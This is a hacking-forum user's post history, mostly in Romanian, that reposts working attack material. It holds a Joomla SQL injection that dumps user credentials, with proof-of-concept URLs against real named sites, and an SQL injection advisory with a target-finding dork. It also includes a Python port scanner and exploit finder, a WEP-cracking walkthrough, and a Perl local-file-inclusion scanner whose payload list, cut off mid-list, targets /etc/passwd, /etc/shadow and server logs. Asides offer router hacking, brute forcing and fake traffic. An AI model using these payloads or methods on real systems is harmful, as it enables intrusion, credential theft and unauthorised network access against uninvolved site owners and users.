-
Posts
214 -
Joined
-
Last visited
-
Days Won
1
Everything posted by trxtxx
-
intru si eu, am 3 conturi cu rating destul de bunicel. daca o sa fie ceva sa nu fiu online va dau conturile la cine poate sa fie. o zi buna
-
virusz mie chiar mi s-au inchis toate procesele ne dorite cu /F, oare comodo sau alte programele oare cum fac? cu /S /F /PID mie la IM mi-a crapat calc. daca mai ai vreun programel care e la fel sa imi dai ca vreau sa fac teste sa vad:d
-
faci rost de o lista mare de proxy-uri, dupa care te apuci iti creezi o noua sesiune de aia si dupa care setezi acolo la cate vizite sa iti dea click pe un alt link care il ai tu tot acolo pe pagina ca sa nu isi dea seama ca e trafic facut pe naspa
-
RadioLabs - Radio, Wireless and Beyond - sau cauta alfa adapter, astea sunt chiar bune. eu am de pe radiolabs magnum wireless, e super jmk. have fun edit: RIP, dupa ce faci rost da-mi un PM si te ajut eu cu hacking-ul la routerul tau in maxim 4-5 minute de la pornirea la airodump-ng. si dupa te poti duce sa faci ravagii in oras:P
-
mai sus am scris niste prostii offtopic asa ca le-am sters. EDIT: am gasit cum se face. manual fara nici un alt programel. so. taskkil /? o sa va apara toate optiunile posibile care le puteti folosii. am incercat taskkill /S sistem /F /IM killme.exe /T si mi-a crapat calculatorul, dupa care am citit mai sus si mi-am adus aminte ca am patit asa cu un virus cu care ma jucam nu se inchidea si am dat /F care inseamna FORCE /F Specifies to forcefully terminate the process(es). taskkill /F /PID pid-ul si s-a inchis. Sper ca am fost de ajutor.
-
si al meu a ajuns e bine ca trimit oamenii rpd:D
-
ba era unul pt pinuri care KIAR merge pt bankpost ( asta daca nu sunt acele carti in care au dat aia in bulgaria si le-au inchis) BRD, si cateva mai merg dar numai tin minte nu am folosit de 3 4 ani. cautati ceva cu mega nu stiu cum. daca il gasesc postez.
-
marian mai era postat aici, anyway good post
-
# Exploit Title: Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability # Date: January 6th, 2010 # Author: Sora # Version: 2.6.1 # Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3) —————————— > Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: Grey Hat Hackers > Google Dork: “In your dreams, script kiddies.” # VULNERABILITY DESCRIPTION: Type: SQL Injection Level: 4/5 (CRITICAL) Sora has advised that Ulisse’s ladder.php file from Ulisse’s Scripts 2.6.1 suffers a remote SQL injection vulnerability in the parameter ‘gid’. The database inputs are not properly sanitized. # VULNERABILITY SOLUTION: Sanitize the unsanitized database inputs in the file ladder.php. # Proof of Concept: http://www.site.com/ulisse/ladder.php?gid=1? Exemple by me + dork: "Powered by Ulisse's Scripts" Sau inurl:ladder.php?gid= RacingClan Networks - Ladder
-
[o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability Software : com_dm_orders [ joomla components ] Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : NoGe.ZoNe [o] Exploit http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 [o] Proof of Concept http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54 http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54 [o] Greetz Anti Security [ Anti Security Team ] Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
-
am eu brute forcer pt triburile.ro / tribalwars.net pt cine e interesat ( nu aveti cred ca nici unu dintre voi cate sate am avut eu acolo ) hahaha
-
RipKid gata am inteles scriptu e luat de pe darkcode...ala saracu a incercat sa ascunda si eu care imi trecusem si numele meu real ma gandeam ca zxici ca imi ascund eu numele praf sunt
-
[-]Exploit Suggester BY FB1H2S Exploitsug.py -->:An Update 4 my serverchk.py -->:http://darkc0de.com/others/Serverchk.py [+]Port scan -->:Tcp scan + SIN-ACK scan (using scapy not shiped default ping me if u wann SIN-ACK) [+]Advance Banner Graber -->:Captures banners perfectly [+]Port Based and Banner Based Exploit Finder -->:Finds Matching exploits form exploitdb based on ports nd Banner [+]Looks for Backdoor's -->:Default Port opned On previous intrusions [+]Tool give a good structure of possible exploits in a single screen #!/usr/bin/python ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ########################################################################################### # Greetz to all Darkc0de Andhra Hackers,ICW Memebers # #Darkc0de : d3hydra,rasuron,nd all darkcode crew # #Hackers Grage : Mr_B0nd,Wipu,GOdwinAugstin,beenu,hubysoft,Mr_H@x0r,r45c4l # #Shoutz ICw : SMART_HAX0R,j4ckh4x0r,41w@r10r,micro,MR xxxx,Hackin,Hoodlum,Dark_blue,# ########################################################################################### ############################FB1h2s######################################################### # [-]Exploit Suggester BY FB1H2S Exploitsug.py -->:An Update 4 my serverchk.py # http://darkc0de.com/others/Serverchk.py #[+]Port scan -->:Tcp scan + SIN-ACK scan (using scapy not shiped default ping # me if u wann SIN-ACK) #[+]Advance Banner Graber -->:Captures banners perfectly #[+]Port Based and Banner Based Exploit Finder -->:Finds Matching exploits form exploitdb based on ports nd # Banner #[+]Looks for Backdoor's -->:Default Port opned On previous intrusions #[+]Tool give a good structure of working exploits import string, sys, time, urllib2,urllib,cookielib,re,random,threading,socket,httplib,os port=0 def banner_match(banner): try: banner_r=banner.strip('\n') FILE=open("vuln.txt","r") banner_rf=FILE.readlines() for banners in banner_rf: if re.search(banners[:-1].lower(),banner.lower()): return banners else: en_banner=raw_input("Enter the Service Version If u have any idea:") if (en_banner !=None): return en_banner else: return except: pass def fetch_exp(banner,port): #banner_rec="OpenSSH" #port=0 print "\nFetching Exploits:"+banner header = ['Mozilla/5.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/5.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows NT 5.0)'] cj = cookielib.FileCookieJar("cookies") des=banner.strip('\n') port=port if(port==0): result_0web ='http://www.exploit-db.com/list.php?description='+des+'&author=&platform=&type=&port=&osvdb=&cve=' elif(len(des)==0 and port!=0): result_0web ='http://www.exploit-db.com/list.php?description=&author=&platform=&type=&port='+repr(port)+'&osvdb=&cve=' elif(len(des)==0 and port==0): return else: result_0web ='http://www.exploit-db.com/list.php?description='+des+'&author=&platform=&type=&port='+repr(port)+'&osvdb=&cve=' exp_url=result_0web.replace(" ","+") #print exp_url try: exp_request = urllib2.Request(exp_url) agent = random.choice(header) exp_request.add_header('User-Agent', agent) exp_open = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) text = exp_open.open(exp_request).read() text=text.replace("\n","end") strreg = re.compile("(?<=href=')(.*?)(?=')") li=re.findall("(?<=_blank)(.*?)(?<=end)",text) li1=re.findall("(?<=_blank)(.*?)(?<=/a)",text) names = strreg.findall(text) li.append(li1) i=0 j=0 for name in names: try: if '/exploit' in name: print '-->'+name.strip('rss.php') print i print '[-]'+li[i].replace("end","---->") i=i+1 #else: print "Nothing Found:' except: pass except:print "Failed:Check Internet Connection" def http_b(ip): try: conn = httplib.HTTPConnection(ip) conn.request("HEAD", "/") res = conn.getresponse() return res.getheader("server") except():print 'error' def exploitscaner(ip): ports=([21,22,23,24,25,63,80,110,135,139,143,445,8080,1433,1723,3306,3389,5900])#These are the ports i alway find sucess with so just limitin the scan http = "80"#21,22,23,24,25,63,80,110,135,139,143,445,8080,1433,1723,3306,3389,5900 #webbdrs=([31373,4444,5555])#c99,metsploit,addmore port_based=[] banner_baser=[] #22,23,24,25,63,80,110,80,139,445,8080,1433,1723,5900,1433,3306,3389, for scanport in ports: sockp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sockp.connect((ip,scanport)) print "*"*70 print "%s:%d OPEN" % (ip,scanport) li.append(scanport) #BOP--:Based on Port no if scanport==80: sockp.close() banner=http_b(ip) banner=banner.replace("-","+") banner=banner.replace("/","+") fetch_exp(banner,port=0) elif scanport==135: sockp.close() print "[+]Microsft ds port" fetch_exp(banner='',port=135) elif scanport==139: sockp.close() print "[+]Microsoft Netbios" fetch_exp(banner='',port=139) elif scanport==445: sockp.close() print "[+]Microsoft smb_tcp" fetch_exp(banner='',port=445) elif scanport==3389: print "[+]Microsoft Remote Desktop" print "\nTry MS05-041, MS09-044" elif scanport==5900: print "[+]Remote Desktop Vnc Viewer" fetch_exp(banner='vnc',port=5900) elif scanport==1433: sockp.close() print "[+]Microsoft SQL Server" r="microsoft+sql" fetch_exp(banner=r,port=0) elif scanport==1521: sockp.close() print "[+]Oracle SQL Server" fetch_exp(banner='oracle',port=1521) elif scanport==3306: sockp.close() print "[+]MYSQL Server" fetch_exp(banner='mysql',port=3306) else: #sockp.send('sas sas') taught of sending some packets : #BOB-:Based On Banner banner = sockp.recv(50) sockp.close() if(len(banner)>3): print "[+] Running:",banner,"\n" banner=banner_match(banner) port=scanport fetch_exp(banner,scanport) print "*"*70 except: pass def back_dor(ip): try: ip=ip webbdrs=([31373,4444,5555])#c99,metsploit,add more for po in webbdrs: sockb = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockb.connect((ip,po)) print "%s:%d OPEN" % (ip,po) except:pass print "[+]Exploit Suggester Version 1.0 by FB1H2S" print "[+]Port scan a Host and List All Matching exploit form Exploit_db" print "[+]Report Bugs at fbone@in.com" print "[+]Now find all Remote Root or Remote DOS Exploits with Exploit-Suggester" if os.path.isfile("vuln.txt"): ip=raw_input("Enter the IP/Domain:") file = open(ip+'.txt', "a") file.write("\n|------------------------------------------------|") file.write("\n| FB1H2S Exploit_Suggester Ver 1.0 |") file.write("\n| Port Scan and Find all Eatching Exploits |") file.write("\n| Uses Exploit_db to Match Exploits |") if len(ip) >3: li=[] exploitscaner(ip) print '\n[+]open ports:' for portop in li: print portop print "\n[+]Scanning Backdoor's " back_dor(ip) print ip+".txt For the Scan details" else: print "\n:( Banner matching File 'Vuln.txt' missing\n" print ":) Download it and put it in the running directory" print "http://www.ziddu.com/download/8031492/vuln.txt.html" pastebin - collaborative debugging tool Daca nu va merge sa ma anuntati foloseste exploit-db pt a verifica daca ip-ul e vulnerabil pt vreun exploit. Have Fun
-
andrei da-mi u mesaj mai incolo privat si iti gassc eu un site care sa iti fac un tutorial specialpt asta, acum am treaba:) good luck
-
gata acum e bine
-
m-ai batut mai incearca sa reformulezi intrebarea ca nu inteleg ce vrei sa zici. presupun ca vrei sa zici cum folosesti scriptu asta pe windows? daca da trebe instalat live perl sau active perl cum draq se numeste dai pe google active perl for windows si gasesti tu
-
Follow these steps: 1) Unzip and install Commview, then paste the included "cv.exe" to the directory you installed it to (c:\program files\commviewwifi) 2) Open commview and install the commview drivers to a card. It should prompt you about your card and than automatically install the driver. It is important that you have 1 card that works with commview or else the rest of the tutorial will not work 3)now go to the "rules" tab and check "enable advanced rules" 4)type in the box labled formula "tods=1 and dmac=FF:FF:FF:FF:FF:FF" then type a name for your formula in the box labled name and than click add/edit. 5)it should now appear in the upper box. if it is not checked, check it. 6)now click settings>options>memory usage and turn maximum packets in buffer to 20000 (max). If it prompts you to restart it, do so. There are three funnel looking things on the main menu bar of commview. uncheck all but the first one (one labled "capture data packets") 7) now click the play button and scan for the network you want to crack. 8)once you have found it, drag the channel menu down to the desired channel and click capture. 9) now using your other adapter thats not capturing, connect to the password protected network. when it asks you for key, type in something random, i used 1234567890. 10) it should now say connected with limited connectivity. (same as being associated!!) 11)go back to your commview menu and click on the packets tab. you should see a couple of packets. 12) looking at the protocol column, you should see a couple labled IP/UDP, ARP REQ, and a couple of others. Right click on any packet labled "ARP REQ" and than click send packet, and selected. A mini menu should now appear. 13) on the mini menu, change packets per second to 2000, and rather than 1 time(s), click continuously, and Then click send. 14) now go back to the main commview window and go to the rules tab, and uncheck the rule you made. 15) You are now injecting and you should see the number of packets rising really fast. 16)to save the packets, you have to save every 20000 packets, click file, save and than in the save dialogue, remember where you saved it, and instead of saving it as an ncf file, save it as a "dump" .cap file. 17) Extract the Aircrack-NG folder. 18)open aircrack-ng-GUI that can be found in the map "bin" and select the files you saved, and than click launch. 19)Look at the list of IV's you have, and select the network you want to crack , there should be a list of alot of them, chose the one with the most ivs. RapidShare: 1-CLICK Web hosting - Easy Filehosting ============================================= L-am gasit pe un forum, pare asa interesant. have fun edit: nu l-am testat pt trojan, virusi si asa mai departe:) care are net bun poate sa il uploadeze pe virustotal, iar daca e safe sa posteze aici si daca e si daca nu. multumesc
-
#!/usr/bin/perl -w use LWP::UserAgent; use HTTP::Request; system('clear','cls'); print "|----------------------------------------------------|\n"; print "| YOGYACARDERLINK Full Local File Inclusion Scanner |\n"; print "| Coded by : v3n0m |\n"; print "| Date : December 19 2009 |\n"; print "| sHoutz : All Yogyacarderlink Crew |\n"; print "| |\n"; print "| |\n"; print "| [url=http://www.yogyacarderlink.web.id]YOGYACARDERLINK[/url] |\n"; print "|----------------------------------------------------|\n\n"; print "\nInsert target: "; chomp(my $target = <STDIN>); if($target !~ /http:\/\//) { $target = "http://$target"; } print "\npress [enter] to check the version of httpd[...]\n"; $httpd =<STDIN>; $host = $target; $useragent = LWP::UserAgent->new; $resp = $useragent->head($host); print $resp->headers_as_string; print "\npress [enter] to check the vulnerability in lfi[...]\n"; $start =<STDIN>; @vulnerabilities = ('/etc/passwd', '/etc/shadow', '/etc/group', '/etc/security/group', '/etc/security/passwd', '/etc/security/user', '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/usr/local/apache/logs/access_ log', '/usr/local/apache/logs/access. log', '/var/log/apache/access_log', '/var/log/apache2/access_log', '/var/log/apache/access.log', '/var/log/apache2/access.log', '/var/log/access_log', '/var/log/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log', '/var/log/apache2/error_log', '/var/log/apache/error.log', '/var/log/apache2/error.log', '/var/log/error_log', '/var/log/error.log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log', '/usr/local/apache2/logs/error_log', '/usr/local/apache2/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/var/log/httpd/access_log', '/var/log/httpd/access.log', '/var/log/httpd/error_log', '/var/log/httpd/error.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/apache2/access_log', '/var/log/apache2/access.log', '/var/log/apache2/error_log', '/var/log/apache2/error.log', '/var/log/access_log', '/var/log/access.log', '/var/log/error_log', '/var/log/error.log', '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log', '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log', '/opt/lampp/logs/access.log', '/opt/lampp/logs/error.log', '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log', '/Program Files\Apache Group\Apache\logs\access.log', '/Program Files\Apache Group\Apache\logs\error.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/access_log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/access_log', '/var/log/error_log', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/etc/apache2/httpd.conf', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf', '/usr/local/httpd/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf', '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf', '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf', '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/http/conf/httpd.conf', '/etc/apache2/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf', '/etc/httpd.conf', '/opt/apache/conf/httpd.conf', '/opt/apache2/conf/httpd.conf', '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf', '/private/etc/httpd/httpd.conf.default', '/Volumes/webBackup/opt/apache2/conf/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', '/Program Files\Apache Group\Apache\conf\httpd.conf', '/Program Files\Apache Group\Apache2\conf\httpd.conf', '/Program Files\xampp\apache\conf\httpd.conf', '/usr/local/php/httpd.conf.php', '/usr/local/php4/httpd.conf.php', '/usr/local/php5/httpd.conf.php', '/usr/local/php/httpd.conf', '/usr/local/php4/httpd.conf', '/usr/local/php5/httpd.conf', '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', '/usr/local/etc/apache/vhosts.conf', '/etc/php.ini', '/bin/php.ini', '/etc/httpd/php.ini', '/usr/lib/php.ini', '/usr/lib/php/php.ini', '/usr/local/etc/php.ini', '/usr/local/lib/php.ini', '/usr/local/php/lib/php.ini', '/usr/local/php4/lib/php.ini', '/usr/local/php5/lib/php.ini', '/usr/local/apache/conf/php.ini', '/etc/php4.4/fcgi/php.ini', '/etc/php4/apache/php.ini', '/etc/php4/apache2/php.ini', '/etc/php5/apache/php.ini', '/etc/php5/apache2/php.ini', '/etc/php/php.ini', '/etc/php/php4/php.ini', '/etc/php/apache/php.ini', '/etc/php/apache2/php.ini', '/web/conf/php.ini', '/usr/local/Zend/etc/php.ini', '/opt/xampp/etc/php.ini', '/var/local/www/conf/php.ini', '/etc/php/cgi/php.ini', '/etc/php4/cgi/php.ini', '/etc/php5/cgi/php.ini', '/php5\php.ini', '/php4\php.ini', '/php\php.ini', '/PHP\php.ini', '/WINDOWS\php.ini', '/WINNT\php.ini', '/apache\php\php.ini', '/xampp\apache\bin\php.ini', '/NetServer\bin\stable\apache\php.ini', '/home2\bin\stable\apache\php.ini', '/home\bin\stable\apache\php.ini', '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', '/usr/local/cpanel/logs', '/usr/local/cpanel/logs/stats_log', '/usr/local/cpanel/logs/access_log', '/usr/local/cpanel/logs/error_log', '/usr/local/cpanel/logs/license_log', '/usr/local/cpanel/logs/login_log', '/usr/local/cpanel/logs/stats_log', '/var/cpanel/cpanel.config', '/var/log/mysql/mysql-bin.log', '/var/log/mysql.log', '/var/log/mysqlderror.log', '/var/log/mysql/mysql.log', '/var/log/mysql/mysql-slow.log', '/var/mysql.log', '/var/lib/mysql/my.cnf', '/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/logrotate.d/proftpd', '/www/logs/proftpd.system.log', '/var/log/proftpd', '/etc/proftp.conf', '/etc/protpd/proftpd.conf', '/etc/vhcs2/proftpd/proftpd.conf', '/etc/proftpd/modules.conf', '/var/log/vsftpd.log', '/etc/vsftpd.chroot_list', '/etc/logrotate.d/vsftpd.log', '/etc/vsftpd/vsftpd.conf', '/etc/vsftpd.conf', '/etc/chrootUsers', '/var/log/xferlog', '/var/adm/log/xferlog', '/etc/wu-ftpd/ftpaccess', '/etc/wu-ftpd/ftphosts', '/etc/wu-ftpd/ftpusers', '/usr/sbin/pure-config.pl', '/usr/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.conf', '/usr/local/etc/pure-ftpd.conf', '/usr/local/etc/pureftpd.pdb', '/usr/local/pureftpd/etc/pureftpd.pdb', '/usr/local/pureftpd/sbin/pure-config.pl', '/usr/local/pureftpd/etc/pure-ftpd.conf', '-/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.pdb', '/etc/pureftpd.pdb', '/etc/pureftpd.passwd', '/etc/pure-ftpd/pureftpd.pdb', '/usr/ports/ftp/pure-ftpd/', '/usr/ports/net/pure-ftpd/', '/usr/pkgsrc/net/pureftpd/', '/usr/ports/contrib/pure-ftpd/', '/var/log/pure-ftpd/pure-ftpd.log', '/logs/pure-ftpd.log', '/var/log/pureftpd.log', '/var/log/ftp-proxy/ftp-proxy.log', '/var/log/ftp-proxy', '/var/log/ftplog', '/etc/logrotate.d/ftp', '/etc/ftpchroot', '/etc/ftphosts', '/var/log/exim_mainlog', '/var/log/exim/mainlog', '/var/log/maillog', '/var/log/exim_paniclog', '/var/log/exim/paniclog', '/var/log/exim/rejectlog', '/var/log/exim_rejectlog', '../etc/passwd', '../../etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd', '../../../../../../../../../../etc/passwd', '../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../..etc/passwd', '../etc/shadow', '../../etc/shadow', '../../../etc/shadow', '../../../../etc/shadow', '../../../../../etc/shadow', '../../../../../../etc/shadow', '../../../../../../../etc/shadow', '../../../../../../../../etc/shadow', '../../../../../../../../../etc/shadow', '../../../../../../../../../../etc/shadow', '../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../../etc/shadow', '../etc/group', '../../etc/group', '../../../etc/group', '../../../../etc/group', '../../../../../etc/group', '../../../../../../etc/group', '../../../../../../../etc/group', '../../../../../../../../etc/group', '../../../../../../../../../etc/group', '../../../../../../../../../../etc/group', '../../../../../../../../../../../etc/group', '../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../../etc/group', '../etc/security/group', '../../etc/security/group', '../../../etc/security/group', '../../../../etc/security/group', '../../../../../etc/security/group', '../../../../../../etc/security/group', '../../../../../../../etc/security/group', '../../../../../../../../etc/security/group', '../../../../../../../../../etc/security/group', '../../../../../../../../../../etc/security/group', '../../../../../../../../../../../etc/security/group', '../etc/security/passwd', '../../etc/security/passwd', '../../../etc/security/passwd', '../../../../etc/security/passwd', '../../../../../etc/security/passwd', '../../../../../../etc/security/passwd', '../../../../../../../etc/security/passwd', '../../../../../../../../etc/security/passwd', '../../../../../../../../../etc/security/passwd', '../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../../etc/security/passwd', '../etc/security/user', '../../etc/security/user', '../../../etc/security/user', '../../../../etc/security/user', '../../../../../etc/security/user', '../../../../../../etc/security/user', '../../../../../../../etc/security/user', '../../../../../../../../etc/security/user', '../../../../../../../../../etc/security/user', '../../../../../../../../../../etc/security/user', '../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00', '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00', '../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00', '../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00', '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00', '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00', '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00', '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00', '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00', '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00', '../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00', '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00', '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00', '../../../../../../../../../../../../../../../apache/logs/access.log%00', '../../../../../../../../../../../../../../../apache/logs/error.log%00', '../../../../../../../../../../../../../../../apache2/logs/error.log%00', '../../../../../../../../../../../../../../../apache2/logs/access.log%00', '../../../../../../../../../../../../../../../var/www/logs/access_log%00', '../../../../../../../../../../../../../../../var/www/logs/access.log%00', '../../../../../../../../../../../../../../../var/log/apache/access_log%00', '../../../../../../../../../../../../../../../var/log/apache2/access_log%00', '../../../../../../../../../../../../../../../var/log/apache/access.log%00', '../../../../../../../../../../../../../../../var/log/apache2/access.log%00', '../../../../../../../../../../../../../../../var/www/logs/error_log%00', '../../../../../../../../../../../../../../../var/www/logs/error.log%00', '../../../../../../../../../../../../../../../var/log/access_log%00', '../../../../../../../../../../../../../../../var/log/access.log%00', '../../../../../../../../../../../../../../../var/log/apache/error_log%00', '../../../../../../../../../../../../../../../var/log/apache2/error_log%00', '../../../../../../../../../../../../../../../var/log/apache/error.log%00', '../../../../../../../../../../../../../../../var/log/apache2/error.log%00', '../../../../../../../../../../../../../../../var/log/error_log%00', '../../../../../../../../../../../../../../../var/log/error.log%00', '../../../../../../../../../../../../../../../var/log/httpd/access_log%00', '../../../../../../../../../../../../../../../var/log/httpd/error_log%00', '../../../../../../../../../../../../../../../var/log/httpd/access.log%00', '../../../../../../../../../../../../../../../var/log/httpd/error.log%00', '../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00', '../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00', '../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00', '../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00', '../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00', '../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00', '../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00', '../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00', '../../../../../../../../../../../../../../../etc/httpd/logs/acces_log', '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log', '../../../../../../../../../../../../../../../etc/httpd/logs/error_log', '../../../../../../../../../../../../../../../etc/httpd/logs/error.log', '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log', '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log', '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log', '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log', '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default', '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log', 